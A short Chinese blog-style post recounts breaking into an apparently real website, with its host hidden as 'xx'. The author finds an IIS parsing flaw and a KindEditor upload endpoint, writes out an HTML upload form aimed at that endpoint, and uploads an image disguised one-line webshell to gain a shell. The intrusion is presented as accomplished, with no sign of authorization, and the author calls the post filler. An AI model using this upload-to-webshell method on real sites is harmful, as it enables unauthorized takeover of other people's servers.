思路决定出路

某站，经测试发现存在 IIS 解析漏洞，且支持PHP 该站程序基于 ACTCMS 可以找 0day 来渗透，但是既然发现了解析漏洞，那么也不能那么简单就放弃掉这个突破点， 网站前台并没有发现上传点，所以换了个思路，用御剑扫出来 KindEditor 编辑器，然后百度了下该编辑器，得到 KindEditor 上传后端处理地址：/editor/kindeditor/asp/upload_json.asp?dir=image 编写上传表单：

<body>
    <form action="http://xx/editor/kindeditor/asp/upload_json.asp?dir=image" method="post" enctype="multipart/form-data">
    <input type="file" name="imgFile" />
    <input type="submit" value="上传文件" />
    </form>
</body>

通过上传表单成功上传图片一句话，成功 getshell 总结一下：好吧，么有总结，其实就是随便发个文章凑下内容的啦。。